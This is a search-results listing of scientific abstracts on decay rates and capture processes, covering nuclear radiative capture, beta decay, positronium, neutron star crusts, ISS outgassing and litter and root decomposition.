method. 19. A New Decay Path in the {sup 12}C+{sup 16}O Radiative Capture Reaction SciTech Connect Courtin, S.; Lebhertz, D.; Haas, F.; Beck, C.; Michalon, A.; Salsac, M.-D.; Jenkins, D. G.; Marley, P.; Lister, C. J. 2009-03-04 The {sup 12}C({sup 16}O,{gamma}){sup 28}Si radiative capture reaction has been studied at energies close to the Coulomb barrier at Triumf (Vancouver) using the Dragon spectrometer and its associated BGO array. It has been observed that the {gamma} decay flux proceeds mainly via states around 10-11 MeV and via the direct feeding of the {sup 28}Si 3{sub 1}{sup -}(6879 keV) and 4{sub 2}{sup +}(6888 keV) deformed states. A discussion is presented about this selective feeding as well as perspectives for the use of novel detection systems for the study of light heavy-ion radiative capture reactions. 20. Double K -shell vacancy production in the electron capture decay of sup 125 I SciTech Connect Hindi, M.M.; Kozub, R.L. ) 1992-03-01 We have measured the probability of double {ital K}-shell vacancy production in the electron capture decay of {sup 125}I to the 35-keV level of {sup 125}Te. The probability was deduced from the number of triple coincidences between the Te hypersatellite and satellite x rays produced in filling the double vacancy, and the subsequent normal x ray accompanying the {ital K} internal conversion of the 35-keV level. 
The probability of double {ital K}-shell vacancy production per {ital K}-shell electron capture ({ital P}{sub {ital K}{ital K}}) was found to be (1.35{plus minus}0.15){times}10{sup {minus}5}. 1. Glueball decay rates in the Witten-Sakai-Sugimoto model Brünner, Frederic; Parganlija, Denis; Rebhan, Anton 2015-05-01 We revisit and extend previous calculations of glueball decay rates in the Sakai-Sugimoto model, a holographic top-down approach for QCD with chiral quarks based on D 8 -D 8 ¯ probe branes in Witten's holographic model of nonsupersymmetric Yang-Mills theory. The rates for decays into two pions, two vector mesons, four pions, and the strongly suppressed decay into four π0 are worked out quantitatively, using a range of the 't Hooft coupling which closely reproduces the decay rate of ρ and ω mesons and also leads to a gluon condensate consistent with QCD sum rule calculations. The lowest holographic glueball, which arises from a rather exotic polarization of gravitons in the supergravity background, turns out to have a significantly lower mass and larger width than the two widely discussed glueball candidates f0(1500 ) and f0(1710 ) . The lowest nonexotic and predominantly dilatonic scalar mode, which has a mass of 1487 MeV in the Witten-Sakai-Sugimoto model, instead provides a narrow glueball state, and we conjecture that only this nonexotic mode should be identified with a scalar glueball component of f0(1500 ) or f0(1710 ). Moreover the decay pattern of the tensor glueball is determined, which is found to have a comparatively broad total width when its mass is adjusted to around or above 2 GeV. 2. Observations of HF backscatter decay rates from HAARP generated FAI Bristow, William; Hysell, David 2016-07-01 Suitable experiments at the High-frequency Active Auroral Research Program (HAARP) facilities in Gakona, Alaska, create a region of ionospheric Field-Aligned Irregularities (FAI) that produces strong radar backscatter observed by the SuperDARN radar on Kodiak Island, Alaska. Creation of FAI in HF ionospheric modification experiments has been studied by a number of authors who have developed a rich theoretical background. The decay of the irregularities, however, has not been so widely studied yet it has the potential for providing estimates of the parameters of natural irregularity diffusion, which are difficult measure by other means. Hysell, et al. [1996] demonstrated using the decay of radar scatter above the Sura heating facility to estimate irregularity diffusion. A large database of radar backscatter from HAARP generated FAI has been collected over the years. Experiments often cycled the heater power on and off in a way that allowed estimates of the FAI decay rate. The database has been examined to extract decay time estimates and diffusion rates over a range of ionospheric conditions. This presentation will summarize the database and the estimated diffusion rates, and will discuss the potential for targeted experiments for aeronomy measurements. Hysell, D. L., M. C. Kelley, Y. M. Yampolski, V. S. Beley, A. V. Koloskov, P. V. Ponomarenko, and O. F. Tyrnov, HF radar observations of decaying artificial field aligned irregularities, J. Geophys. Res. , 101, 26,981, 1996. 3. Observations of HF backscatter decay rates from HAARP generated FAI Bristow, W. A.; Hysell, D. L. 
2016-12-01 Suitable experiments at the High-frequency Active Auroral Research Program (HAARP) facilities in Gakona, Alaska, create a region of ionospheric Field-Aligned Irregularities (FAI) that produces strong radar backscatter observed by the SuperDARN radar on Kodiak Island, Alaska. Creation of FAI in HF ionospheric modification experiments has been studied by a number of authors who have developed a rich theoretical background. The decay of the irregularities, however, has not been so widely studied yet it has the potential for providing estimates of the parameters of natural irregularity diffusion, which are difficult measure by other means. Hysell, et al. [1996] demonstrated using the decay of radar scatter above the Sura heating facility to estimate irregularity diffusion. A large database of radar backscatter from HAARP generated FAI has been collected over the years. Experiments often cycled the heater power on and off in a way that allowed estimates of the FAI decay rate. The database has been examined to extract decay time estimates and diffusion rates over a range of ionospheric conditions. This presentation will summarize the database and the estimated diffusion rates, and will discuss the potential for targeted experiments for aeronomy measurements. Hysell, D. L., M. C. Kelley, Y. M. Yampolski, V. S. Beley, A. V. Koloskov, P. V. Ponomarenko, and O. F. Tyrnov, HF radar observations of decaying artificial field aligned irregularities, J. Geophys. Res. , 101, 26,981, 1996. 4. Time decay rates of non-Newtonian flows in RN+ Dong, Bo-Qing; Chen, Zhi-Min 2006-12-01 This paper is concerned with time decay rates of the weak solutions of an incompressible non-Newtonian fluid motion model in half spaces for n[greater-or-equal, slanted]3. With the use of the spectral decomposition of the Stokes operator and Lp-Lq estimates, it is shown that the weak solutions decay in L2 norm like when the initial velocity u0[set membership, variant]L2[intersection]Lr for 1[less-than-or-equals, slant]r<2. The higher decay rates are obtained, if u0 satisfies the additional moment condition Moreover, the error estimates between the non-Newtonian flow and the Navier-Stokes flow are discussed. 5. Radiative decay rates of impurity states in semiconductor nanocrystals Turkov, Vadim K.; Baranov, Alexander V.; Fedorov, Anatoly V.; Rukhlenko, Ivan D. 2015-10-01 Doped semiconductor nanocrystals is a versatile material base for contemporary photonics and optoelectronics devices. Here, for the first time to the best of our knowledge, we theoretically calculate the radiative decay rates of the lowest-energy states of donor impurity in spherical nanocrystals made of four widely used semiconductors: ZnS, CdSe, Ge, and GaAs. The decay rates were shown to vary significantly with the nanocrystal radius, increasing by almost three orders of magnitude when the radius is reduced from 15 to 5 nm. Our results suggest that spontaneous emission may dominate the decay of impurity states at low temperatures, and should be taken into account in the design of advanced materials and devices based on doped semiconductor nanocrystals. 6. Radiative decay rates of impurity states in semiconductor nanocrystals SciTech Connect Turkov, Vadim K.; Baranov, Alexander V.; Fedorov, Anatoly V.; Rukhlenko, Ivan D. 2015-10-15 Doped semiconductor nanocrystals is a versatile material base for contemporary photonics and optoelectronics devices. 
Here, for the first time to the best of our knowledge, we theoretically calculate the radiative decay rates of the lowest-energy states of donor impurity in spherical nanocrystals made of four widely used semiconductors: ZnS, CdSe, Ge, and GaAs. The decay rates were shown to vary significantly with the nanocrystal radius, increasing by almost three orders of magnitude when the radius is reduced from 15 to 5 nm. Our results suggest that spontaneous emission may dominate the decay of impurity states at low temperatures, and should be taken into account in the design of advanced materials and devices based on doped semiconductor nanocrystals. 7. Decay strength distributions in {sup 12}C({sup 12}C,{gamma}) radiative capture SciTech Connect Jenkins, D. G.; Fulton, B. R.; Marley, P.; Fox, S. P.; Glover, R.; Wadsworth, R.; Watson, D. L.; Courtin, S.; Haas, F.; Lebhertz, D.; Beck, C.; Papka, P.; Rousseau, M.; Sanchez i Zafra, A.; Hutcheon, D. A.; Davis, C.; Ottewell, D.; Pavan, M. M.; Pearson, J.; Ruiz, C. 2007-10-15 The heavy-ion radiative capture reaction, {sup 12}C({sup 12}C,{gamma}), has been investigated at energies both on- and off-resonance, with a particular focus on known resonances at E{sub c.m.}=6.0, 6.8, 7.5, and 8.0 MeV. Gamma rays detected in a BGO scintillator array were recorded in coincidence with {sup 24}Mg residues at the focal plane of the DRAGON recoil separator at TRIUMF. In this manner, the relative strength of all decay pathways through excited states up to the particle threshold could be examined for the first time. Isovector M1 transitions are found to be a important component of the radiative capture from the E{sub c.m.}=6.0 and 6.8 MeV resonances. Comparison with Monte Carlo simulations suggests that these resonances may have either J=0 or 2, with a preference for J=2. The higher energy resonances at E{sub c.m.}=7.5 and 8.0 MeV have a rather different decay pattern. The former is a clear candidate for a J=4 resonance, whereas the latter has a dominant J=4 character superposed on a J=2 resonant component underneath. The relationship between these resonances and the well-known quasimolecular resonances as well as resonances in breakup and electrofission of {sup 24}Mg into two {sup 12}C nuclei are discussed. 8. Capturing relic neutrinos with {beta}- and double {beta}-decaying nuclei SciTech Connect Hodak, Rastislav; Kovalenko, Sergey; Simkovic, Fedor 2009-11-09 Neutrinos are probably one of the most important structural constituents of the Universe. The Big Bang Theory predicts that the significant component of them is formed by the cosmic neutrino background, an analogues of the big bang relic photons comprising the cosmic microwave background radiation, which has been measured with amazing accuracy. Properties of the relic neutrino background are closely related to the ones of the cosmic microwave radiation. Relic neutrinos pervade space, but their temperature is extremely small, being of the order of 0.1 meV. Although belonging to the most abundant particles of the Universe, the relic neutrinos evade direct detection so far. This is because the low-energy neutrinos interact only very weakly with matter. In this contribution, we explore the feasibility to detect the cosmic neutrino background by means of {beta}-decaying ({sup 3}H and {sup 187}Re) and double beta decaying ({sup 100}Mo) nuclei. In addition, we address the question whether double relic neutrino capture on nuclei can be an obstacle for observation of neutrinoless double {beta}-decay. 9. 
Litter decay rates are determined by lignin chemistry Treesearch Jennifer M. Talbot; Daniel J. Yelle; James Nowick; Kathleen K. Treseder 2011-01-01 Litter decay rates are often correlated with the initial lignin:N or lignin:cellulose content of litter, suggesting that interactions between lignin and more labile compounds are important controls over litter decomposition. The chemical composition of lignin may influence these interactions, if lignin physically or chemically protects labile components from microbial... 10. Influences of the astrophysical environment on nuclear decay rates SciTech Connect Norman, E.B. 1987-09-01 In many astronomical environments, physical conditions are so extreme that nuclear decay rates can be significantly altered from their laboratory values. Such effects are relevant to a number of current problems in nuclear astrophysics. Experiments related to these problems are now being pursued, and will be described in this talk. 19 refs., 5 figs. 11. Beta-decay rates: towards a self-consistent approach SciTech Connect Borzov, I. N.; Goriely, S.; Pearson, J. M. 1998-02-15 An approximation to a self-consistent model of the ground state properties and spin-isospin excitations of neutron-rich nuclides is outlined. The structure of the Gamow-Teller strength functions in stable nuclei and short-lived nuclides undergoing high-energy {beta}-decay is discussed. The results of large-scale calculations of the {beta}-decay rates for spherical and slightly deformed nuclides of relevance to the r-process are analysed and compared with the results of existing global calculations. 12. Uncertainties in Astrophysical β-decay Rates from the FRDM SciTech Connect Bertolli, M.G.; Möller, P.; Jones, S. 2014-06-15 β{sup −}-decay rates are of crucial importance in stellar evolution and nucleosynthesis, as they are a key component in stellar processes. Tabulated values of the decay rates as functions of both temperature T and density ρ are necessary input to stellar evolution codes such as MESA, or largescale nucleosynthesis simulations such as those performed by the NuGrid collaboration. Therefore, it is interesting to know the uncertainties in these rates and the effects of these uncertainties on stellar structure and isotopic yields. We have calculated β-strength functions and reaction rates for nuclei ranging from {sup 16}O to {sup 339}136, extending from the proton drip line to the neutron drip line based on a quasi-particle random-phase approximation (QRPA) in a deformed folded-Yukawa single-particle model. Q values are determined from the finite-range droplet mass model (FRDM). We have investigated the effect of model uncertainty on astrophysical β{sup −}-decay rates calculated by the FRDM. The sources of uncertainty considered are Q values and deformation. The rates and their uncertainties are generated for a variety of temperature and density ranges, corresponding to key stellar processes. We demonstrate the effects of these rate uncertainties on isotopic abundances using the NuGrid network calculations. 13. Double K -shell vacancy production in the electron capture decay of sup 139 Ce SciTech Connect Hindi, M.M.; Kozub, R.L. ) 1991-02-01 The probability of double {ital K}-shell vacancy production in the electron capture decay of {sup 139}Ce to the 166-keV level of {sup 139}La has been investigated. Triple coincidences between the 166-keV gamma ray, the La satellite {ital K}{alpha} x ray, and the La hypersatellite {ital K}{alpha} x ray were measured using two intrinsic Ge detectors. 
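A practical note on the tabulated rates mentioned in the FRDM abstract above: stellar evolution and network codes typically interpolate log10 of the rate on the (temperature, density) grid. The sketch below is a hedged illustration with made-up table values, not FRDM/QRPA numbers and not the actual MESA or NuGrid routines.

import numpy as np
from scipy.interpolate import RegularGridInterpolator

log_T = np.array([8.0, 9.0, 10.0])            # log10 temperature [K]
log_rho = np.array([2.0, 5.0, 8.0])           # log10 density [g/cm^3]
log_rate = np.array([[-8.0, -6.0, -3.0],      # log10 rate [1/s], illustrative
                     [-7.0, -5.0, -2.0],
                     [-6.0, -4.0, -1.0]])

interp = RegularGridInterpolator((log_T, log_rho), log_rate)
rate = 10.0 ** interp([[9.3, 6.5]])[0]
print(f"interpolated decay rate ~ {rate:.2e} 1/s at log T = 9.3, log rho = 6.5")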
We looked for the sum of two of the three radiations in one detector in coincidence with the third radiation in the other detector. The probability of double {ital K}-shell vacancy production per {ital K}-shell electron capture ({ital P}{sub {ital K}{ital K}}) was found to be (2.0{plus minus}1.6){times}10{sup {minus}6}. From this and the known {ital P}{sub {ital K}{ital K}} for {sup 131}Cs we estimate a probability for zero {ital K}-shell vacancy production (shakedown) per {ital K}-shell electron capture of {approx lt}2.4{times}10{sup {minus}5} for {sup 139}Ce. 14. Materials Outgassing Rate Decay in Vacuum at Isothermal Conditions NASA Technical Reports Server (NTRS) Huang, Alvin Y.; Kastanas, George N.; Kramer, Leonard; Soares, Carlos E.; Mikatarian, Ronald R. 2016-01-01 As a laboratory for scientific research, the International Space Station has been in Low Earth Orbit for nearly 20 years and is expected to be on-orbit for another 10 years. The ISS has been maintaining a relatively pristine contamination environment for science payloads. Materials outgassing induced contamination is currently the dominant source for sensitive surfaces on ISS and modeling the outgassing rate decay over a 20 to 30 year period is challenging. Materials outgassing is described herein as a diffusion-reaction process using ASTM E 1559 rate data. The observation of -1/2 (diffusion) or non-integers (reaction limited) as rate decay exponents for common ISS materials indicate classical reaction kinetics is unsatisfactory in modeling materials outgassing. Non-randomness of reactant concentrations at the interface is the source of this deviation from classical reaction kinetics. A diffusion limited decay was adopted as the result of the correlation of the contaminant layer thicknesses on returned ISS hardware, the existence of high outgassing silicone exhibiting near diffusion limited decay, and the confirmation of non-depleted material after ten years in the Low Earth Orbit.Keywords: Materials Outgassing, ASTM E 1559, Reaction Kinetics, Diffusion, Space Environments Effects, Contamination 15. Materials outgassing rate decay in vacuum at isothermal conditions Huang, Alvin Y.; Kastanas, George N.; Kramer, Leonard; Soares, Carlos E.; Mikatarian, Ronald R. 2016-09-01 As a laboratory for scientific research, the International Space Station has been in Low Earth Orbit for over 17 years and is planned to be on-orbit for another 10 years. The ISS has been maintaining a relatively pristine contamination environment for science payloads. Materials outgassing induced contamination is currently the dominant source for sensitive surfaces on ISS and modelling the outgassing rate decay over a 20 to 30 year period is challenging. Using ASTM E 1559 rate data, materials outgassing is described herein as a diffusion-reaction process with the interface playing a key role. The observation of -1/2 (diffusion) or non-integers (reaction limited) as rate decay exponents for common ISS materials indicate classical reaction kinetics is unsatisfactory in modelling materials outgassing. Nonrandomness of reactant concentrations at the interface is the source of this deviation from classical reaction kinetics. 
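The -1/2 (diffusion-limited) versus non-integer (reaction-limited) exponents discussed above can be read directly off ASTM E 1559-style rate-versus-time data. A minimal sketch with synthetic numbers:

import numpy as np

t_hours = np.array([1.0, 2.0, 5.0, 10.0, 20.0, 50.0, 100.0])
rate = 3.0e-7 * t_hours ** -0.5            # synthetic outgassing rate data

# For rate ~ t**(-n), n is minus the slope of log(rate) versus log(time);
# n close to 0.5 indicates diffusion-limited outgassing.
slope, _ = np.polyfit(np.log(t_hours), np.log(rate), 1)
print(f"fitted rate-decay exponent n = {-slope:.2f}")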
A t-1/2 decay is adopted as the result of the correlation of the contaminant layer thicknesses and composition on returned ISS hardware, the existence of high outgassing silicone exhibiting near diffusion limited decay, the confirmation of nondepleted material after ten years in Low Earth Orbit, and a potential slowdown of long term materials outgassing kinetics due to silicone contaminants at the interface. 16. Power Spectrum Analysis of BNL Decay-Rate Data DTIC Science & Technology 2010-01-01 93524, USA d Department of Physics, United States Air Force Academy, CO 80920, USA Keywords: Sun, Neutrinos • Corresponding author. Tel +1...irradiance data have been found to be closely related to rotation rate estimates derived from low-energy solar- neutrino data, this result supports the...recent conjecture that solar neutrinos may be responsible for variations in nuclear decay rates. We also carry out a similar comparison with local 17. Precision Measurement of the Singlet Positronium Decay Rate This is a new measurement of the annihilation decay rate, lambda_{S}, of parapositronium (p-Ps) as a test of quantum electrodynamics (QED). The measured value is lambda_ {S} = (7991.5 +/- 1.7) mu s^{-1}. At 210 ppm accuracy this result is 6.5 times more accurate than the previous measurement and is the first measurement sensitive enough to test the relative order alpha ^2lnalpha term in the QED calculation of lambda_{S}. This measurement, which is in agreement with theory, is particularly interesting in light of the 1500 ppm discrepancy between theory and experiment that still exists in the decay rate, lambda_{T}, of orthopositronium (o-Ps). This measurement is made using beta -decay positrons from a ^{68 }Ge-^{68}Ga source which form positronium in a variety of gas mixtures. The time interval between the emission of a positron and the detection of the annihilation gamma -ray is measured with a time-to-digital converter. The distribution of the time intervals is collected as an annihilation lifetime spectrum. lambda_{S } is measured indirectly by using magnetic mixing. In a magnetic field the m = 0 ground states mix to produce a state, o-Ps^', which has a faster decay rate, lambda_sp {T}{'}. Hence, at any gas density, rho, the histogram is fitted to two exponential components with decay rates, lambda_{T}(rho) and lambda_sp{T}{' }(rho). A quantity, Lambda( rho), linear in the gas density and equal to lambda_{S} at zero density, is calculated from the two measured decay rates and the value of the magnetic field. It is found that Lambda(rho) has a small slope due to spin exchange quenching in the gas. This slope is measured in a separate experiment and a correction is made for this. The quantity lambda_{S } is separately measured in N_2 and CO_2 (each mixed with various small percentages of isobutane) over a wide range of pressures and at two values of the magnetic field. The measured values of lambda_{S } are in agreement. The measurement in CO _2 is considered as a 18. New search for double electron capture in {sup 106}Cd decay with the TGV-2 spectrometer SciTech Connect Briançon, Ch.; Brudanin, V. B.; Egorov, V. G.; Jose, J. M.; Klimenko, A. A.; Kovalik, A.; Rosov, S. V.; Rukhadze, E. N.; Rukhadze, N. I. Salamatin, A. V.; Timkin, V. V.; Fajt, L.; Hodak, R.; Šimkovic, F.; Shitov, Yu. A.; Špavorova, M.; Štekl, I.; Yakushev, E. A. 
2015-09-15 A new experiment devoted to searches for double electron capture in {sup 106}Cd decay is being performed at the Modane underground laboratory (4800 mwe) with the 32-detector TGV-2 spectrometer. The limit T{sub 1/2}(2νEC/EC) > 2.0×10{sup 20} yr at a 90%confidence level (C.L.) was obtained from a preliminary analysis of data obtained over 2250 h of measurements with about 23.2 g sample enriched in the isotope {sup 106}Cd to 99.57%. The limits T{sub 1/2}(KL, 2741 keV) > 0.9 × 10{sup 20} yr and T{sub 1/2}(KK, 2718 keV) ≫ 1.4 × 10{sup 20} yr at a 90% C.L. on the neutrinoless decay of {sup 106}Cd were obtained from measurements performed with the Obelix low-background spectrometer from high-purity germanium (HPGe spectrometer) for a sample of mass about 23.2 g enriched in the isotope {sup 106}Cd. 19. Time Modulation of the {beta}{sup +}-Decay Rate of H-Like {sup 140}Pr{sup 58+} Ions SciTech Connect Ivanov, A. N.; Kryshen, E. L.; Pitschmann, M.; Kienle, P. 2008-10-31 Recent experimental data at GSI on the rates of the number of daughter ions, produced by the nuclear K-shell electron capture (EC) decays of the H-like ions {sup 140}Pr{sup 58+} and {sup 142}Pm{sup 60+}, suggest that they are modulated in time with periods T{sub EC}{approx_equal}7 sec and amplitudes a{sub EC}{approx_equal}0.20. Since it is known that these ions are unstable also under the nuclear positron ({beta}{sup +}) decays, we study a possible time dependence of the nuclear {beta}{sup +}-decay rate of the H-like {sup 140}Pr{sup 58+} ion. We show that the time dependence of the {beta}{sup +}-decay rate of the H-like {sup 140}Pr{sup 58+} ion as well as any H-like heavy ions cannot be observed. 20. Effects of fog droplets on wake vortex decay rate NASA Technical Reports Server (NTRS) Moulden, T. H.; Frost, W. 1976-01-01 A simple model for the motion of particles in a laminar line vortex is discussed. The energy required to accelerate a set of these particles was determined and shown to be only a small fraction of the energy content of the vortex flow. It is shown that this energy transfer is unlikely to be sufficient to significantly modify the vortex decay rate. It is further argued that the effect of the particle on the viscous properties of the resulting two phase fluid leads to a slower decay rate than in single phase air flow. However, this conclusion may not necessarily follow for turbulence flows. Results show that the migration of particles to the outer flow results in a redistribution of the velocity profile in the vortex and in a non-uniform two phase viscosity across the core. It is suggested that these effects may accelerate vortex bursting. 1. 31Cl beta decay and the 30P31S reaction rate in nova nucleosynthesis Bennett, Michael; Wrede, C.; Brown, B. A.; Liddick, S. N.; Pérez-Loureiro, D.; NSCL e12028 Collaboration 2016-03-01 The 30P31S reaction rate is critical for modeling the final isotopic abundances of ONe nova nucleosynthesis, identifying the origin of presolar nova grains, and calibrating proposed nova thermometers. Unfortunately, this rate is essentially experimentally unconstrained because the strengths of key 31S proton capture resonances are not known, due to uncertainties in their spins and parities. Using a 31Cl beam produced at the National Superconducting Cyclotron Laboratory, we have populated several 31S states for study via beta decay and devised a new decay scheme which includes updated beta feedings and gamma branchings as well as multiple states previously unobserved in 31Cl beta decay. 
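For context on why those resonance strengths matter (a hedged sketch, not a result of this study): for an isolated narrow resonance, the 30P(p,γ)31S rate contribution follows the standard expression N_A<σv> ≈ 1.54×10^11 (μT9)^(-3/2) ωγ[MeV] exp(-11.605 Er[MeV]/T9) cm^3 mol^-1 s^-1, so the rate is exponentially sensitive to the resonance energy Er and linear in the strength ωγ. The resonance energy and strength below are hypothetical placeholders.

import math

def narrow_resonance_rate(T9, Er_MeV, omega_gamma_MeV, mu):
    # Standard narrow-resonance contribution to N_A<sigma*v> in cm^3/mol/s.
    return (1.5399e11 / (mu * T9) ** 1.5) * omega_gamma_MeV * \
        math.exp(-11.605 * Er_MeV / T9)

mu = 1.0 * 30.0 / 31.0                       # reduced mass number for p + 30P
for T9 in (0.1, 0.2, 0.3):                   # nova-like temperatures, GK
    print(T9, narrow_resonance_rate(T9, Er_MeV=0.25, omega_gamma_MeV=1.0e-10, mu=mu))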
Results of this study, including the unambiguous identification due to isospin mixing of a new l = 0 , Jπ = 3 /2+ 31S resonance directly in the middle of the Gamow Window, will be presented, and significance to the evaluation of the 30P31S reaction rate will be discussed. Work supported by U.S. Natl. Sci. Foundation (Grants No. PHY-1102511, PHY-1404442, PHY-1419765, and PHY-1431052); U.S. Dept. of Energy, Natl. Nucl. Security Administration (Award No. DE-NA0000979); Nat. Sci. and Eng. Research Council of Canada. 2. The MuCap experiment: A measurement of the muon capture rate in hydrogen gas SciTech Connect Banks, T. I. 2007-10-26 We have recently measured the rate of nuclear muon capture by the proton, using a novel technique which involves a time projection chamber operating in ultraclean, deuterium-depleted hydrogen gas. The target's low gas density of 1% compared to liquid hydrogen is key to avoiding uncertainties that arise from the formation of muonic molecules. The capture rate from the hyperfine singlet ground state of the {mu}p atom was obtained from the difference between the {mu}{sup -} disappearance rate in hydrogen and the world average for the {mu}{sup +} decay rate, yielding {lambda}{sub S} = 725.0{+-}17.4 s{sup -1}, from which the induced pseudoscalar coupling of the nucleon, g{sub P}(q{sup 2} = 0.88m{sub {mu}}{sup 2}) = 7.3{+-}1.1, is extracted. This result is consistent with theoretical predictions for g{sub P} that are based on the approximate chiral symmetry of QCD. 3. Strong neutrino cooling by cycles of electron capture and β- decay in neutron star crusts. PubMed Schatz, H; Gupta, S; Möller, P; Beard, M; Brown, E F; Deibel, A T; Gasques, L R; Hix, W R; Keek, L; Lau, R; Steiner, A W; Wiescher, M 2014-01-02 The temperature in the crust of an accreting neutron star, which comprises its outermost kilometre, is set by heating from nuclear reactions at large densities, neutrino cooling and heat transport from the interior. The heated crust has been thought to affect observable phenomena at shallower depths, such as thermonuclear bursts in the accreted envelope. Here we report that cycles of electron capture and its inverse, β(-) decay, involving neutron-rich nuclei at a typical depth of about 150 metres, cool the outer neutron star crust by emitting neutrinos while also thermally decoupling the surface layers from the deeper crust. This 'Urca' mechanism has been studied in the context of white dwarfs and type Ia supernovae, but hitherto was not considered in neutron stars, because previous models computed the crust reactions using a zero-temperature approximation and assumed that only a single nuclear species was present at any given depth. The thermal decoupling means that X-ray bursts and other surface phenomena are largely independent of the strength of deep crustal heating. The unexpectedly short recurrence times, of the order of years, observed for very energetic thermonuclear superbursts are therefore not an indicator of a hot crust, but may point instead to an unknown local heating mechanism near the neutron star surface. 4. Strong neutrino cooling by cycles of electron capture and decay in neutron star crusts SciTech Connect Schatz, Hendrik; Gupta, Sanjib; Moeller, Peter; Beard, Mary; Brown, Edward; Deibel, A. 
T.; Gasques, Leandro; Hix, William Raphael; Keek, Laurens; Lau, Rita; Steiner, Andrew M; Wiescher, Michael 2013-01-01 5. Solvent Polarity Effect on Nonradiative Decay Rate of Thioflavin T. PubMed Stsiapura, Vitali I; Kurhuzenkau, Siarhei A; Kuzmitsky, Valery A; Bouganov, Oleg V; Tikhomirov, Sergey A 2016-07-21 It has been established earlier that the fluorescence quantum yield of thioflavin T (ThT), a probe widely used for amyloid fibril detection, is viscosity-dependent, and the photophysical properties of ThT can be well described by the fluorescent molecular rotor model, which associates a twisted internal charge transfer (TICT) reaction with the main nonradiative decay process in the excited state of the dye. Solutions of ThT in a range of polar solvents were studied using steady-state fluorescence and sub-picosecond transient absorption spectroscopy methods, and we showed that the solvent effect on the nonradiative transition rate knr cannot be reduced to a dependence on viscosity only and that a ∼3-fold change of knr can be observed for ThT in aprotic solvents and water, which correlates with solvent polarity. Different behavior was observed in alcohol solutions, particularly in longer n-alcohols, where the TICT rate was mainly determined by rotational diffusion of ThT fragments. Quantum-chemical calculations of the S0 → S1 transition energy were performed to gain insight into the polar solvent contribution to the excited-state energy stabilization. The effect of a polar solvent on the electronic energy levels of ThT was simulated by applying a homogeneous electric field according to the Onsager cavity model. The static solvent effect on the excited-state potential energy surface, where the charge transfer reaction takes place, was not essential to account for the experimentally observed TICT rate differences in water and aprotic solvents. On the other hand, the nonradiative decay rate of ThT in water, ethylene glycol, and aprotic solvents was found to follow the dynamics of polar solvation, knr ∼ τS^-1, which can explain the dependence of the TICT rate on both polarity and viscosity of the solvents. 6.
Charge-exchange reactions and electron-capture rates for presupernova stellar evolution Zegers, Remco 2015-04-01 Weak reaction rates such as electron captures and beta decays play major roles in a variety of astrophysical phenomena, such as core-collapse and thermonuclear supernovae and accreting neutron stars. Consequently, the use of accurate weak reaction rates in astrophysical simulations to understand these phenomena is important. Unfortunately, the number of relevant nuclei is typically very large, and, except for a few special cases, it is impossible to rely on experimental results only: theoretical models must be used to estimate the weak reaction rates. These models can then be benchmarked and improved on the basis of a limited number of experimental data. The most important nuclear structure input that is required for calculating weak reaction rates is Gamow-Teller transition strengths. Although these can be extracted from beta and electron-capture decay data, the energy window accessible by such experiments is limited, if accessible at all. However, at the high temperatures and densities that occur in massive stars prior to their cataclysmic demise, transitions to final states at high excitation energies are important. In addition, to properly test theory, full Gamow-Teller transition strength distributions are very valuable. Fortunately, nature is kind: charge-exchange experiments at intermediate energies can provide the relevant strength distributions over a wide energy window, and a variety of charge-exchange probes, such as (p,n), (n,p), (d,2He) and (t,3He), have been used to extract strengths of relevance for astrophysics (and for other purposes). This presentation will focus on efforts to validate electron capture rates calculated based on nuclear structure models for nuclei with masses ranging from A ~ 40-65, and on studies aimed at testing astrophysical sensitivities to uncertainties/deviations in the theoretical rates. These efforts include experiments with unstable isotopes, and special gamma-ray coincidence techniques to localize very weak, but 7. No evidence for a decrease of nuclear decay rates with increasing heliocentric distance based on radiochronology of meteorites Meier, Matthias M. M.; Wieler, Rainer 2014-03-01 Moreover, the oldest U-Pb ages of meteorites agree with the main-sequence age of the sun derived from helioseismology within the formal ~1% uncertainty of the latter. Meteorite ages also provide no evidence for a decrease of decay rates with heliocentric distance for nuclides such as 87Rb (decay mode β-), 40K (β- and electron capture), and 147Sm (α). 8. Precision measurements of positronium decay rate and energy level SciTech Connect Asai, S.; Kataoka, Y.; Kobayashi, T.; Namba, T.; Suehara, T.; Akimoto, G.; Ishida, A.; Hashimoto, M. M.; Saito, H.; Idehara, T.; Yoshida, M. 2008-08-08 Positronium is an ideal system for research on bound-state QED. A new precise measurement of the orthopositronium decay rate has been performed with an accuracy of 150 ppm, and the result combined with the last three is 7.0401 ± 0.0007 μs^-1. It is the first result to validate the second-order correction. The hyperfine splitting (HFS) of positronium is sensitive to the higher-order corrections of the QED prediction and also to new physics beyond the Standard Model via quantum oscillation into a virtual photon. A discrepancy of 3.5σ has recently been found between the measured values and the QED prediction (O(α^3)).
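The 3.5σ figure quoted above is the usual significance of a difference between two independent numbers, z = |x1 − x2| / sqrt(σ1² + σ2²). A minimal sketch with hypothetical HFS-like values (not the actual measured or predicted numbers) follows.

```python
import math

# Hypothetical stand-ins for a measured and a predicted positronium HFS value [GHz]
hfs_measured, err_measured = 203.3891, 0.0007
hfs_theory,   err_theory   = 203.3921, 0.0005

# Significance of the difference in units of the combined standard deviation
z = abs(hfs_measured - hfs_theory) / math.sqrt(err_measured**2 + err_theory**2)
print(f"discrepancy = {z:.1f} sigma")
```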
This discrepancy might be due to contributions of new physics or to systematic problems in the previous measurements (non-thermalized Ps and non-uniformity of the magnetic field). We propose new methods to measure the HFS precisely without these uncertainties. 9. New decay branches of the radiative capture reaction 12C(16O,γ)28Si SciTech Connect Lebhertz, D.; Courtin, S.; Haas, F.; Salsac, M.-D.; Beck, C.; Michalon, A.; Rousseau, M.; Marley, P. L.; Glover, R. G.; Kent, P. E.; Hutcheon, D. A.; Davis, C.; Pearson, J. E. 2009-01-28 Resonances in the 12C(16O,γ)28Si radiative capture process at energies around the Coulomb barrier have been probed using the very selective 0° DRAGON spectrometer at TRIUMF and its associated BGO γ-array. For the first time the full level scheme involved in this process has been measured, and it shows previously unobserved γ-decay to doorway states around 11 MeV in 28Si. 10. Fine root decay rates vary widely among lowland tropical tree species. PubMed Raich, James W; Russell, Ann E; Valverde-Barrantes, Oscar 2009-08-01 Prolific fine root growth coupled with small accumulations of dead fine roots indicates rapid rates of fine root production, mortality and decay in young tree plantations in lowland Costa Rica. However, published studies indicate that fine roots decay relatively slowly in tropical forests. To resolve this discrepancy, we used the intact-core technique to quantify first-year decay rates of fine roots in four single-species plantations of native tree species. We tested three hypotheses: first, that fine roots from different tree species would decay at different rates; second, that species having rapid fine root growth rates would also have rapid rates of fine root decay; and third, that differences in fine root decay among species could be explained by fine root chemistry variables previously identified as influencing decay rates. Fine roots in 